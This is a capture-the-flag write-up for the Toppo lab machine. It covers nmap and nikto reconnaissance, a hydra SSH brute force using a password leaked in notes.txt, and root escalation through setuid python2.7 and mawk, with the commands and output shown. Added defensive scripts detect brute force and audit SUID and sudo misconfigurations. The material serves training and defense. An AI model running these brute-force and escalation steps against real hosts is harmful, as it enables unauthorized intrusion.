
Information gathering

  • The target sits on the vmnet8 NIC at IP 192.168.131.144, with web and ssh services open.

➜  ~ ip a show dev vmnet8
5: vmnet8: <BROADCAST,MULTICAST,UP,LOWER_UP> mtu 1500 qdisc fq_codel state UNKNOWN group default qlen 1000
link/ether 00:50:56:c0:00:08 brd ff:ff:ff:ff:ff:ff
inet 192.168.131.1/24 brd 192.168.131.255 scope global vmnet8
valid_lft forever preferred_lft forever
inet6 fe80::250:56ff:fec0:8/64 scope link
valid_lft forever preferred_lft forever
➜ ~ nmap -sn 192.168.131.1/24
Starting Nmap 7.70 ( https://nmap.org ) at 2018-10-30 19:46 CST
Nmap scan report for 192.168.131.1
Host is up (0.00055s latency).
Nmap scan report for 192.168.131.144
Host is up (0.00093s latency).
Nmap done: 256 IP addresses (2 hosts up) scanned in 3.08 seconds
➜ ~ nmap -T4 -A 192.168.131.144
Starting Nmap 7.70 ( https://nmap.org ) at 2018-10-30 20:01 CST
Nmap scan report for 192.168.131.144
Host is up (0.43s latency).
Not shown: 997 closed ports
PORT STATE SERVICE VERSION
22/tcp open ssh OpenSSH 6.7p1 Debian 5+deb8u4 (protocol 2.0)
| ssh-hostkey:
| 1024 ec:61:97:9f:4d:cb:75:99:59:d4:c1:c4:d4:3e:d9:dc (DSA)
| 2048 89:99:c4:54:9a:18:66:f7:cd:8e:ab:b6:aa:31:2e:c6 (RSA)
| 256 60:be:dd:8f:1a:d7:a3:f3:fe:21:cc:2f:11:30:7b:0d (ECDSA)
|_ 256 39:d9:79:26:60:3d:6c:a2:1e:8b:19:71:c0:e2:5e:5f (ED25519)
80/tcp open http Apache httpd 2.4.10 ((Debian))
|_http-server-header: Apache/2.4.10 (Debian)
|_http-title: Clean Blog - Start Bootstrap Theme
111/tcp open rpcbind 2-4 (RPC #100000)
| rpcinfo:
| program version port/proto service
| 100000 2,3,4 111/tcp rpcbind
| 100000 2,3,4 111/udp rpcbind
| 100024 1 41760/udp status
|_ 100024 1 44661/tcp status
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel
Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 9.36 seconds
  • nikto found an admin directory and a mail directory.
➜  ~ nikto -h http://192.168.131.144/
- Nikto v2.1.6
---------------------------------------------------------------------------
+ Target IP: 192.168.131.144
+ Target Hostname: 192.168.131.144
+ Target Port: 80
+ Start Time: 2018-10-30 20:04:51 (GMT8)
---------------------------------------------------------------------------
+ Server: Apache/2.4.10 (Debian)
+ Server leaks inodes via ETags, header found with file /, fields: 0x1925 0x563f5cf714e80
+ The anti-clickjacking X-Frame-Options header is not present.
+ The X-XSS-Protection header is not defined. This header can hint to the user agent to protect against some forms of XSS
+ The X-Content-Type-Options header is not set. This could allow the user agent to render the content of the site in a different fashion to the MIME type
+ No CGI Directories found (use '-C all' to force check all possible dirs)
+ Apache/2.4.10 appears to be outdated (current is at least Apache/2.4.12). Apache 2.0.65 (final release) and 2.2.29 are also current.
+ Allowed HTTP Methods: GET, HEAD, POST, OPTIONS
+ OSVDB-3268: /admin/: Directory indexing found.
+ OSVDB-3092: /admin/: This might be interesting...
+ OSVDB-3268: /img/: Directory indexing found.
+ OSVDB-3092: /img/: This might be interesting...
+ OSVDB-3268: /mail/: Directory indexing found.
+ OSVDB-3092: /mail/: This might be interesting...
+ OSVDB-3092: /manual/: Web server manual found.
+ OSVDB-3268: /manual/images/: Directory indexing found.
+ OSVDB-3233: /icons/README: Apache default file found.
+ 7535 requests: 0 error(s) and 15 item(s) reported on remote host
+ End Time: 2018-10-30 20:05:10 (GMT8) (19 seconds)
---------------------------------------------------------------------------
+ 1 host(s) tested
  • The admin directory contains a notes.txt file with his old password, 12345ted123. It also mentions technology, fishing and soccer, which is useful for social engineering.
➜  ~ curl http://192.168.131.144/admin/notes.txt
Note to myself : I need to change my password :/ 12345ted123 is too outdated but the technology isn't my thing i prefer go fishing or watching soccer .

Brute-forcing ssh

  • Generate a wordlist and brute-force ssh with the username ted. Don't ask me how I knew it; everyone online guessed it too. The challenge author just didn't give many hints, so: intuition.
  • hydra recovers the password 12345ted123.
➜  pydictor git:(master) ✗ python pydictor.py -plug scratch http://192.168.131.144/admin/notes.txt
_ _ _
_ __ _ _ __| (_) ___| |_ ___ _ __
| '_ \| | | |/ _` | |/ __| __/ _ \| '__|
| |_) | |_| | (_| | | (__| || (_) | |
| .__/ \__, |\__,_|_|\___|\__\___/|_|
|_| |___/ 2.1.1#dev
[+] A total of :11 lines
[+] Store in :/home/kali-team/Kali-Team/password-recovery/pydictor/results/scratch_214601.txt
[+] Cost :0.0451 seconds
➜ pydictor git:(master) ✗ cat results/scratch_214601.txt
myself
password
12345ted123
outdated
technology
thing
prefer
fishing
watching
soccer
admin
➜ ~ hydra -l ted -P Kali-Team/password-recovery/pydictor/results/scratch_215638.txt ssh://192.168.131.144
Hydra v8.6 (c) 2017 by van Hauser/THC - Please do not use in military or secret service organizations, or for illegal purposes.
Hydra (http://www.thc.org/thc-hydra) starting at 2018-10-30 21:57:18
[WARNING] Many SSH configurations limit the number of parallel tasks, it is recommended to reduce the tasks: use -t 4
[DATA] max 11 tasks per 1 server, overall 11 tasks, 11 login tries (l:1/p:11), ~1 try per task
[DATA] attacking ssh://192.168.131.144:22/
[22][ssh] host: 192.168.131.144 login: ted password: 12345ted123
1 of 1 target successfully completed, 1 valid password found
Hydra (http://www.thc.org/thc-hydra) finished at 2018-10-30 21:57:21
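From the defender's side, the hydra run above leaves a very recognisable trace in the target's auth log: a burst of failed password attempts for one user from one address within a few seconds, followed by an accepted login from the same address. The shell script below is an added example, not part of the original write-up, that scans an auth.log for that pattern; the sample log lines, addresses, PIDs and timestamps in it are constructed for the example.

```shell
#!/bin/sh
# Added example (not from the original write-up): flag SSH password-guessing
# runs in an auth.log by counting "Failed password" lines per source address.

# Constructed sample auth.log lines shaped like OpenSSH syslog output; the
# addresses, PIDs and timestamps are made up for this example.
SAMPLE_AUTH_LOG='Oct 30 21:57:18 Toppo sshd[1901]: Failed password for ted from 192.168.131.1 port 40210 ssh2
Oct 30 21:57:18 Toppo sshd[1903]: Failed password for ted from 192.168.131.1 port 40212 ssh2
Oct 30 21:57:19 Toppo sshd[1905]: Failed password for ted from 192.168.131.1 port 40214 ssh2
Oct 30 21:57:19 Toppo sshd[1907]: Failed password for ted from 192.168.131.1 port 40216 ssh2
Oct 30 21:57:20 Toppo sshd[1909]: Failed password for ted from 192.168.131.1 port 40218 ssh2
Oct 30 21:57:20 Toppo sshd[1911]: Failed password for ted from 192.168.131.1 port 40220 ssh2
Oct 30 21:57:21 Toppo sshd[1913]: Accepted password for ted from 192.168.131.1 port 40222 ssh2
Oct 30 21:58:02 Toppo sshd[1950]: Failed password for alice from 10.0.0.7 port 51000 ssh2
Oct 30 21:58:05 Toppo sshd[1952]: Failed password for invalid user admin from 10.0.0.7 port 51001 ssh2'

# detect_ssh_bruteforce LOGFILE [THRESHOLD]
# Prints "<ip> failed=<n>" for every source address with at least THRESHOLD
# (default 5) failed password attempts, and appends "then-accepted" when a
# successful password login from that address follows the failures, which is
# the pattern a successful dictionary attack leaves behind.
detect_ssh_bruteforce() {
  logfile=$1
  threshold=${2:-5}
  awk -v thr="$threshold" '
    function src_ip(    i) {
      # "invalid user" lines shift the fields, so locate the "from" token
      for (i = 1; i <= NF; i++) if ($i == "from") return $(i + 1)
      return ""
    }
    /sshd\[[0-9]+\]: Failed password for/   { fails[src_ip()]++ }
    /sshd\[[0-9]+\]: Accepted password for/ { ip = src_ip(); if (fails[ip] > 0) accepted[ip] = 1 }
    END {
      for (ip in fails)
        if (fails[ip] >= thr)
          printf "%s failed=%d%s\n", ip, fails[ip], (ip in accepted) ? " then-accepted" : ""
    }' "$logfile"
}

# Stand-alone run: write the constructed sample to a temp file and scan it.
AUTH_LOG_FILE=$(mktemp)
printf '%s\n' "$SAMPLE_AUTH_LOG" > "$AUTH_LOG_FILE"
detect_ssh_bruteforce "$AUTH_LOG_FILE"
```

The function takes a file path so it can be pointed at a real /var/log/auth.log; on the sample it reports only 192.168.131.1 (six failures, then an accepted login), while the two stray failures from 10.0.0.7 stay under the threshold. Counting per address rather than per user is deliberate, since hydra's parallel tasks show up as many PIDs but one source. Key-only authentication, a low MaxAuthTries in sshd_config and a lockout tool close this path; the password sitting in a world-readable notes.txt is the actual root cause on this box.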

Privilege escalation and getting the flag

  • Look for programs with the SUID bit set.
ted@Toppo:~$ id
uid=1000(ted) gid=1000(ted) groups=1000(ted),24(cdrom),25(floppy),29(audio),30(dip),44(video),46(plugdev),108(netdev),114(bluetooth)
ted@Toppo:~$ find / -perm -u=s -type f 2>/dev/null
/sbin/mount.nfs
/usr/sbin/exim4
/usr/lib/eject/dmcrypt-get-device
/usr/lib/dbus-1.0/dbus-daemon-launch-helper
/usr/lib/openssh/ssh-keysign
/usr/bin/gpasswd
/usr/bin/newgrp
/usr/bin/python2.7
/usr/bin/chsh
/usr/bin/at
/usr/bin/mawk
/usr/bin/chfn
/usr/bin/procmail
/usr/bin/passwd
/bin/su
/bin/umount
/bin/mount
  • Look for programs that can be run with sudo without the root password; it turns out mawk and Python2.7 don't need one either.
ted@Toppo:~$ cat /etc/sudoers
ted ALL=(ALL) NOPASSWD: /usr/bin/awk
    1. Python
    2. mawk
ted@Toppo:/bin$ python -c 'import pty;pty.spawn("/bin/sh")'
# id
uid=1000(ted) gid=1000(ted) euid=0(root) groups=1000(ted),24(cdrom),25(floppy),29(audio),30(dip),44(video),46(plugdev),108(netdev),114(bluetooth)
ted@Toppo:/bin$ id
uid=1000(ted) gid=1000(ted) groups=1000(ted),24(cdrom),25(floppy),29(audio),30(dip),44(video),46(plugdev),108(netdev),114(bluetooth)
ted@Toppo:/bin$ mawk 'BEGIN {system("/bin/sh")}'
# id
uid=1000(ted) gid=1000(ted) euid=0(root) groups=1000(ted),24(cdrom),25(floppy),29(audio),30(dip),44(video),46(plugdev),108(netdev),114(bluetooth)
# cat /root/flag.txt
_________
| _ _ |
|_/ | | \_|.--. _ .--. _ .--. .--.
| | / .'`\ \[ '/'`\ \[ '/'`\ \/ .'`\ \
_| |_ | \__. | | \__/ | | \__/ || \__. |
|_____| '.__.' | ;.__/ | ;.__/ '.__.'
[__| [__|
Congratulations ! there is your flag : 0wnedlab{p4ssi0n_c0me_with_pract1ce}
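The two findings in this section, a setuid-root python2.7 and mawk plus a NOPASSWD sudo rule for awk, are exactly the misconfigurations a periodic host audit should catch before anyone else does. The shell script below is an added example, not from the original write-up: it reads a list of SUID paths (such as the output of the find command above) and a sudoers file, and flags the entries that hand out a shell. The list of shell-capable programs is an assumption kept short for the example, and the sample sudoers lines other than ted's rule are constructed.

```shell
#!/bin/sh
# Added audit helper (not from the original write-up): flag SUID binaries and
# passwordless sudo rules that hand out a shell. The list of shell-capable
# programs below is an assumption kept short for the example; extend it from
# a reference such as GTFOBins for real use.
SHELL_CAPABLE='sh bash dash python python2 python2.7 python3 perl ruby awk mawk gawk nawk vi vim less more find'

# is_shell_capable PATH: true when the program's basename is on the list.
is_shell_capable() {
  name=$(basename "$1")
  for s in $SHELL_CAPABLE; do
    [ "$name" = "$s" ] && return 0
  done
  return 1
}

# audit_suid_list FILE: FILE holds one path per line, e.g. the output of
#   find / -perm -4000 -type f 2>/dev/null
# Prints the SUID binaries that can spawn a shell (a setuid-root interpreter
# runs arbitrary code as root; passwd, su or mount are expected to be SUID).
audit_suid_list() {
  while IFS= read -r path; do
    [ -n "$path" ] || continue
    if is_shell_capable "$path"; then
      printf 'SUID shell-capable: %s\n' "$path"
    fi
  done < "$1"
}

# audit_sudoers FILE: prints every uncommented NOPASSWD rule whose command
# list contains ALL or a shell-capable program. Commands are split on commas
# and whitespace, so arguments appear as separate tokens (a simplification).
audit_sudoers() {
  grep -E '^[^#]*NOPASSWD:' "$1" | while IFS= read -r rule; do
    cmds=${rule#*NOPASSWD:}
    for cmd in $(printf '%s' "$cmds" | tr ',' ' '); do
      if [ "$cmd" = "ALL" ] || is_shell_capable "$cmd"; then
        printf 'NOPASSWD shell-capable: %s\n' "$rule"
        break
      fi
    done
  done
}

# Constructed inputs: the SUID list is a subset of the one found on the box
# above; the sudoers lines are made up apart from ted's rule.
SAMPLE_SUID_LIST='/usr/bin/python2.7
/usr/bin/mawk
/usr/bin/passwd
/bin/su
/bin/mount'
SAMPLE_SUDOERS='# NOPASSWD: /bin/sh inside a comment must not be flagged
ted ALL=(ALL) NOPASSWD: /usr/bin/awk
bob ALL=(ALL) NOPASSWD: /sbin/reboot, /sbin/shutdown
carol ALL=(ALL) NOPASSWD: ALL'

SUID_FILE=$(mktemp)
SUDOERS_FILE=$(mktemp)
printf '%s\n' "$SAMPLE_SUID_LIST" > "$SUID_FILE"
printf '%s\n' "$SAMPLE_SUDOERS" > "$SUDOERS_FILE"
audit_suid_list "$SUID_FILE"
audit_sudoers "$SUDOERS_FILE"
```

On the sample it flags /usr/bin/python2.7 and /usr/bin/mawk but not passwd, su or mount, and flags ted's awk rule and carol's ALL while leaving bob's reboot rule alone. On a real host feed it `find / -perm -4000 -type f 2>/dev/null` and /etc/sudoers together with /etc/sudoers.d/*. The fix on this box is to clear the SUID bit from the two interpreters and drop the awk rule: a passwordless sudo entry for any program that can run arbitrary commands is equivalent to NOPASSWD: ALL.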

Notes

  • During testing I noticed that although Python runs with root privileges, executing bash and executing dash from it yield different privileges: bash comes back with ordinary privileges, while dash comes back as root. After asking for help on WeChat Moments three times I finally understood it: bash started with the -p flag (Posix mode) also keeps root. The new thing I picked up here is the POSIX 1003.2 standard; anyone interested can look it up. I won't go into it here, it would probably take several pages.
ted@Toppo:~$ python -c 'import os;os.system("/bin/bash -p")'
bash-4.3# id
uid=1000(ted) gid=1000(ted) euid=0(root) groups=1000(ted),24(cdrom),25(floppy),29(audio),30(dip),44(video),46(plugdev),108(netdev),114(bluetooth)
bash-4.3# exit
exit
ted@Toppo:~$ python -c 'import os;os.system("/bin/bash")'
bash-4.3$ id
uid=1000(ted) gid=1000(ted) groups=1000(ted),24(cdrom),25(floppy),29(audio),30(dip),44(video),46(plugdev),108(netdev),114(bluetooth)
bash-4.3$ exit
exit
ted@Toppo:~$ python -c 'import os;os.system("/bin/dash")'
# id
uid=1000(ted) gid=1000(ted) euid=0(root) groups=1000(ted),24(cdrom),25(floppy),29(audio),30(dip),44(video),46(plugdev),108(netdev),114(bluetooth)
# exit

root 1926 0.0 1.0 10988 5420 ? Ss 11:05 0:00 \_ sshd: ted [priv]
ted 1928 0.0 0.7 10988 4088 ? S 11:05 0:00 \_ sshd: ted@pts/0
ted 1929 0.0 0.8 6376 4288 pts/0 Ss 11:05 0:00 \_ -bash
root 2011 0.0 1.1 9816 6120 pts/0 S+ 11:13 0:00 \_ python -c import pty;pty.spawn("/bin/bash")
ted 2012 0.0 0.6 5448 3528 pts/1 Ss 11:13 0:00 \_ /bin/bash
ted 2013 0.0 0.4 4768 2548 pts/1 R+ 11:13 0:00 \_ ps aux f

root 1926 0.0 1.0 10988 5420 ? Ss 11:05 0:00 \_ sshd: ted [priv]
ted 1928 0.0 0.7 10988 4084 ? S 11:05 0:00 \_ sshd: ted@pts/0
ted 1929 0.0 0.8 6376 4288 pts/0 Ss 11:05 0:00 \_ -bash
root 1998 0.0 1.1 9816 6012 pts/0 S+ 11:11 0:00 \_ python -c import pty;pty.spawn("/bin/dash")
root 1999 0.0 0.2 2272 1380 pts/1 Ss 11:11 0:00 \_ /bin/dash
root 2001 0.0 0.4 4768 2416 pts/1 R+ 11:12 0:00 \_ ps aux f
